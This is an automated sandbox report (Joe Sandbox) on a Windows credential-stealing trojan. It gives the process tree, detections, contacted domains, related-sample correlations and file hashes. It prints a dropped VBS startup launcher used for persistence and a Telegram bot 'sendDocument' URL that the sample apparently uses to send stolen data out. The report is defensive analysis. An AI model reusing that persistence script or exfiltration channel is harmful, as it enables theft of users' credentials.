                  Distributed Component Object Model121
                  Input Capture
                  13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets341
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder
                  1
                  Masquerading
                  Cached Domain Credentials2
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Valid Accounts
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem1
                  System Owner/User Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Network Configuration Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1576075
Sample: ref_97024130865.exe
Startdate: 16/12/2024
Architecture: WINDOWS
Score: 100
Contacted domains: reallyfreegeoip.org, checkip.dyndns.org, checkip.dyndns.com
Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 12 other signatures
• reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
• ref_97024130865.exe (started)
  • Dropped: C:\Users\user\AppData\...\nonplacental.exe, PE32
  • Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  • Started: nonplacental.exe
    • Dropped: C:\Users\user\AppData\...\nonplacental.vbs, data
    • Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures
    • Started: RegSvcs.exe
      • checkip.dyndns.com 193.122.130.0, ports 49704, 49706, 80, ORACLE-BMC-31898US, United States
      • reallyfreegeoip.org 104.21.67.152, ports 443, 49705, 49709, CLOUDFLARENETUS, United States
• wscript.exe (started)
  • Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  • Started: nonplacental.exe
    • Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Maps a DLL or memory area into another process
    • Started: RegSvcs.exe
      • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
ref_97024130865.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
ref_97024130865.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\juvenile\nonplacental.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\juvenile\nonplacental.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.67.152 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org | false | | high
  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp
http://checkip.dyndns.org | false | | high
  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp
http://checkip.dyndns.com | false | | high
  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp
https://reallyfreegeoip.org/xml/8.46.123.189l | false | | high
  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | false | | high
  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp
https://api.telegram.org/bot-/sendDocument?chat_id= | false | | high
  Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp
http://checkip.dyndns.org/q | false | | high
  Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp
http://reallyfreegeoip.org | false | | high
  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B08000.00000004.00000800.00020000.00000000.sdmp
https://reallyfreegeoip.org/xml/ | false | | high
  Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1576075
                                              Start date and time:2024-12-16 14:10:38 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 24s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:ref_97024130865.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 95%
                                              • Number of executed functions: 63
                                              • Number of non-executed functions: 273
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: ref_97024130865.exe
Time | Type | Description
14:11:33 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.67.152 | CITAS_pif.exe | malicious | MassLogger RAT |
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
 | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader |
 | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT |
 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT |
 | Request for Quotations and specifications.pdf.exe | malicious | MassLogger RAT |
 | hesaphareketi-01.pdf.exe | malicious | Snake Keylogger |
193.122.130.0 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
 | file.exe | malicious | Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc | checkip.dyndns.org/
 | AsyncClient.exe | malicious | AsyncRAT, HVNC, PureLog Stealer | checkip.dyndns.org/
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | Malzeme #U0130stek Formu_12102024.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | jXN37dkptv.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | CITAS_pif.exe | malicious | MassLogger RAT | 132.226.8.169
 | conferma..exe | malicious | MassLogger RAT | 132.226.8.169
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 158.101.44.242
 | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.6.168
 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 158.101.44.242
 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
 | file.exe | malicious | Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc | 193.122.130.0
 | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
 | file.exe | malicious | Snake Keylogger | 132.226.8.169
reallyfreegeoip.org | CITAS_pif.exe | malicious | MassLogger RAT | 104.21.67.152
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
 | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 104.21.67.152
 | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
 | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134
 | file.exe | malicious | Snake Keylogger | 172.67.177.134
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 104.21.67.152
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | CITAS_pif.exe | malicious | MassLogger RAT | 104.21.67.152
 | nB52P46OJD.exe | malicious | Vidar | 172.64.41.3
 | 54FApnc7eR.exe | malicious | LummaC | 172.67.177.250
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
 | PO.bat.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
 | https://www.sendspace.com/pro/dl/m2hhc1 | malicious | Unknown | 104.17.25.14
 | https://protect.checkpoint.com/v2/r02/___https://url1251.popmenu.com/qxdhqnhp?zus=z556.WRHPCjsgt/tA51B6LI9w4BubTYwM5p/-7KrggkVEpmPU5/oVFKKM8Rk6rAnqtQtILc2Q2H_3u9DiXC41Sfynx8MyN*~*gGwOol/aO3BY*~*pgD37kbc4-7KGmCSO4DHGqcB*~*D2S053knP-7G*~*y37ScDgrX/lhFDF7r7h5Gwz-7GtvZLu*~*h33zX5RXwSF0oDJX34CSZAvVXm4AFQJ-7Gq-7KxI/mcm4qvQmbxushMLQI9uHWfHKaPI5mifSCu5iVBRcvqUxu7JB4CzzH*~*tp7hI*~*P2JxcRqKbjQDa1m4EV2vJju-7KXGYhKkA/NMg4b3nlprWADF7NLfLtJTf5xKVlxz1PBE*~*XIwKJANjSZxzJHsTEzwI07xTpBPmh9cjRp3bNxF-8I___.YzJlOm1zbm90aWZ5OmM6bzphNDQ0NjUwYTgwNjk4YzE1YzQzODY0NjgzZWZkNGFjNzo3Ojk1N2U6NjEyMTFiMTNiOTljZDFhYmUzOWRiNzM5NDE0NGE3NDNhMDJkZjlhMmI1NzgzMzhlZTAwMjhmZTBkODVlNWNmZDpoOlQ6VA | malicious | Unknown | 104.17.25.14
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer | 172.67.220.198
 | https://login.corp-internal.org/17058d3d8656ed69?l=27 | malicious | Unknown | 104.16.99.29
 | https://www.sendspace.com/pro/dl/m2hhc1 | malicious | Unknown | 104.17.25.14
ORACLE-BMC-31898US | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 158.101.44.242
 | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.6.168
 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 158.101.44.242
 | arm5.elf | malicious | Unknown | 147.154.242.4
 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
 | file.exe | malicious | Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc | 193.122.130.0
 | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
 | elitebotnet.x86.elf | malicious | Mirai, Okiru | 140.204.52.53
 | 77541373_BESOZT00_2024_99101234_1_4_1.exe | malicious | MassLogger RAT | 158.101.44.242
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | CITAS_pif.exe | malicious | MassLogger RAT | 104.21.67.152
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
 | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 104.21.67.152
 | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
 | Tvl72VM6PM.exe | malicious | Unknown | 104.21.67.152
 | Tvl72VM6PM.exe | malicious | Unknown | 104.21.67.152
 | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
 | file.exe | malicious | Snake Keylogger | 104.21.67.152
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):143378
                                                                  Entropy (8bit):2.9942426555066564
                                                                  Encrypted:false
                                                                  SSDEEP:96:AIXLr4g+F05BhNfCs0FlRZpA6brTSBGcuZ9Izy2ul3mrWVjjrqnBaAJZdjureb3T:H3fjERRoGcuZ9Izy2ul3mrWVjqnBaA
                                                                  MD5:BB9AFA8306A3BEF21CCEAE432685104B
                                                                  SHA1:686FFC5186048A100BCDB54D281E4339FC1F3AF6
                                                                  SHA-256:E6D1C6C0670080395027B4BA5B68C13951E10778E392764997F6FAEB0B809DA0
                                                                  SHA-512:11F4B3AE1EC345A8150295CF054BB13950E61B64D4A92280258FBA8634FE854FFF1872E6B6EC4D00CBD139250FBB3C3BC0ED532A5D0CF19790C254C5C100C9E5
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):204310
                                                                  Entropy (8bit):7.980521466831075
                                                                  Encrypted:false
                                                                  SSDEEP:6144:29PBUTRtFpu35kLXekPIVYfuZTCAqUe4bWNO5ybt:EQZpUGSIKYGsd4Ck5yB
                                                                  MD5:F420D0695FCA9AF6CA2C0EBE8F9EA03B
                                                                  SHA1:EE58808A3F2D7EE2FF0EC3862E4B0AB3F3AD4831
                                                                  SHA-256:6C06868290011943337AF92F477B677C781F9DC1E8A1657DCAE5C757E1264FEF
                                                                  SHA-512:DE91F1FD284DE316C160CE3EE050212FB695850FD13D236AC7EE8EC5E62BBA813112DC9E065E5B5DDA16310F7731A5908821970CB585046643EA519E47053CBF
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14654
                                                                  Entropy (8bit):7.627026730990899
                                                                  Encrypted:false
                                                                  SSDEEP:384:ITYznwyHtzwpHj13YvmbzMoHJOrK8elPfAvBYEVJSRgIf1:IAwyHtzwBj2mrHBlKBZMa8
                                                                  MD5:23F71F90FDACAF295124BC9396F383D1
                                                                  SHA1:C1D725B70E56390083C8294A8668F67BA7C5D636
                                                                  SHA-256:88A6C661CE71B7C69B8E6D03D6D3D7E2421733E6426DC863A743F2B8F7FF0F60
                                                                  SHA-512:9F934F03B9227DF67278CE29ECEF57B8EA704DE307B7773BEF10EBE7546F458E3D2F29054D0450B16C3AD7A383AF3320E3EDE388D5AA236263B660244BCC3FFA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):204310
                                                                  Entropy (8bit):7.980521466831075
                                                                  Encrypted:false
                                                                  SSDEEP:6144:29PBUTRtFpu35kLXekPIVYfuZTCAqUe4bWNO5ybt:EQZpUGSIKYGsd4Ck5yB
                                                                  MD5:F420D0695FCA9AF6CA2C0EBE8F9EA03B
                                                                  SHA1:EE58808A3F2D7EE2FF0EC3862E4B0AB3F3AD4831
                                                                  SHA-256:6C06868290011943337AF92F477B677C781F9DC1E8A1657DCAE5C757E1264FEF
                                                                  SHA-512:DE91F1FD284DE316C160CE3EE050212FB695850FD13D236AC7EE8EC5E62BBA813112DC9E065E5B5DDA16310F7731A5908821970CB585046643EA519E47053CBF
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14654
                                                                  Entropy (8bit):7.627026730990899
                                                                  Encrypted:false
                                                                  SSDEEP:384:ITYznwyHtzwpHj13YvmbzMoHJOrK8elPfAvBYEVJSRgIf1:IAwyHtzwBj2mrHBlKBZMa8
                                                                  MD5:23F71F90FDACAF295124BC9396F383D1
                                                                  SHA1:C1D725B70E56390083C8294A8668F67BA7C5D636
                                                                  SHA-256:88A6C661CE71B7C69B8E6D03D6D3D7E2421733E6426DC863A743F2B8F7FF0F60
                                                                  SHA-512:9F934F03B9227DF67278CE29ECEF57B8EA704DE307B7773BEF10EBE7546F458E3D2F29054D0450B16C3AD7A383AF3320E3EDE388D5AA236263B660244BCC3FFA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):204310
                                                                  Entropy (8bit):7.980521466831075
                                                                  Encrypted:false
                                                                  SSDEEP:6144:29PBUTRtFpu35kLXekPIVYfuZTCAqUe4bWNO5ybt:EQZpUGSIKYGsd4Ck5yB
                                                                  MD5:F420D0695FCA9AF6CA2C0EBE8F9EA03B
                                                                  SHA1:EE58808A3F2D7EE2FF0EC3862E4B0AB3F3AD4831
                                                                  SHA-256:6C06868290011943337AF92F477B677C781F9DC1E8A1657DCAE5C757E1264FEF
                                                                  SHA-512:DE91F1FD284DE316C160CE3EE050212FB695850FD13D236AC7EE8EC5E62BBA813112DC9E065E5B5DDA16310F7731A5908821970CB585046643EA519E47053CBF
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14654
                                                                  Entropy (8bit):7.627026730990899
                                                                  Encrypted:false
                                                                  SSDEEP:384:ITYznwyHtzwpHj13YvmbzMoHJOrK8elPfAvBYEVJSRgIf1:IAwyHtzwBj2mrHBlKBZMa8
                                                                  MD5:23F71F90FDACAF295124BC9396F383D1
                                                                  SHA1:C1D725B70E56390083C8294A8668F67BA7C5D636
                                                                  SHA-256:88A6C661CE71B7C69B8E6D03D6D3D7E2421733E6426DC863A743F2B8F7FF0F60
                                                                  SHA-512:9F934F03B9227DF67278CE29ECEF57B8EA704DE307B7773BEF10EBE7546F458E3D2F29054D0450B16C3AD7A383AF3320E3EDE388D5AA236263B660244BCC3FFA
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):208896
                                                                  Entropy (8bit):7.844880601848825
                                                                  Encrypted:false
                                                                  SSDEEP:3072:i9O9jf0UmS/OR6QX3VI9L+40EZWYaolYjybauhLP8Kztz9js4cuaj+ct1c2tmjPq:x+S/ses40EZWjgYjMHVpz9YrR+ct62tP
                                                                  MD5:B1E24E004A4024F16913D4CEB6A21FA6
                                                                  SHA1:55E2E0834DAEA5FCC553256F1F7DF584D32EA63F
                                                                  SHA-256:40FCEE586FC0674B49A660F524D172415EED8B7EC2D2B6886E7E145BD6302159
                                                                  SHA-512:231D0F0DFC1A58725EED9885E8DD8DDDB01F33C106E4FF2D6BD3061EFFB05D638AFACDC836CD386686AADB0DF9EFA86AAB49E1A17405027027A7FF9A9DFE934F
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1112064
                                                                  Entropy (8bit):7.077904330186389
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Qu6J33O0c+JY5UZ+XC0kGso6FakwzhOgNe5YvTYWY:au0c++OCvkGs9FakQxKYvfY
                                                                  MD5:687AF4583057DD6924F0102DEF1B8F89
                                                                  SHA1:451232EFA9E8891D1C87C81B9E5BE3FB7E62E5B5
                                                                  SHA-256:CAAFF6D88CAFFF7AEF0CCC6BA09E9E15B54763B8EE85054EFF6D812EDC5302C6
                                                                  SHA-512:52879300C02AD259462A4840C45338EEBA5A31D73060BF7602B6D5B09E77BE3A98D6B611136E78FF48594ED96FFCE3D1E6A9E0683894980E6D54094C3C09F453
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                                  Process:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):3.392822050419667
                                                                  Encrypted:false
                                                                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1SlpAHsrQlTlupRdnriIM8lfQVn:DsO+vNlzQ1swT0tmA2n
                                                                  MD5:CF1D51BC43E693B42D972CFA8010427C
                                                                  SHA1:26C4FBE3AB086D759DC88A5048663F6961757EE2
                                                                  SHA-256:78032F1EAFB296F3EB46D011AC507C534EB19D03FB0E16AF36A690F9D0C65C69
                                                                  SHA-512:D31CFFBA07E627373091669065AEFAA6218379BA263A56776E1BC8D5C02B57D0044C4DAE264D3642B607A9E653E90C4348BE050151E645C8EEF071B495411801
                                                                  Malicious:true
Preview (UTF-16LE text, shown decoded):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\alfons\AppData\Local\juvenile\nonplacental.exe", 1
Set WshShell = Nothing
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.077904330186389
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:ref_97024130865.exe
                                                                  File size:1'112'064 bytes
                                                                  MD5:687af4583057dd6924f0102def1b8f89
                                                                  SHA1:451232efa9e8891d1c87c81b9e5be3fb7e62e5b5
                                                                  SHA256:caaff6d88cafff7aef0ccc6ba09e9e15b54763b8ee85054eff6d812edc5302c6
                                                                  SHA512:52879300c02ad259462a4840c45338eeba5a31d73060bf7602b6d5b09e77be3a98d6b611136e78ff48594ed96ffce3d1e6a9e0683894980e6d54094c3c09f453
                                                                  SSDEEP:24576:Qu6J33O0c+JY5UZ+XC0kGso6FakwzhOgNe5YvTYWY:au0c++OCvkGs9FakQxKYvfY
                                                                  TLSH:5935CF2273DDC360CB769173BF6AB7016EBB7C210630B95B2F980D7DA950162162D7A3
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                  Icon Hash:aaf3e3e3938382a0
                                                                  Entrypoint:0x427dcd
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
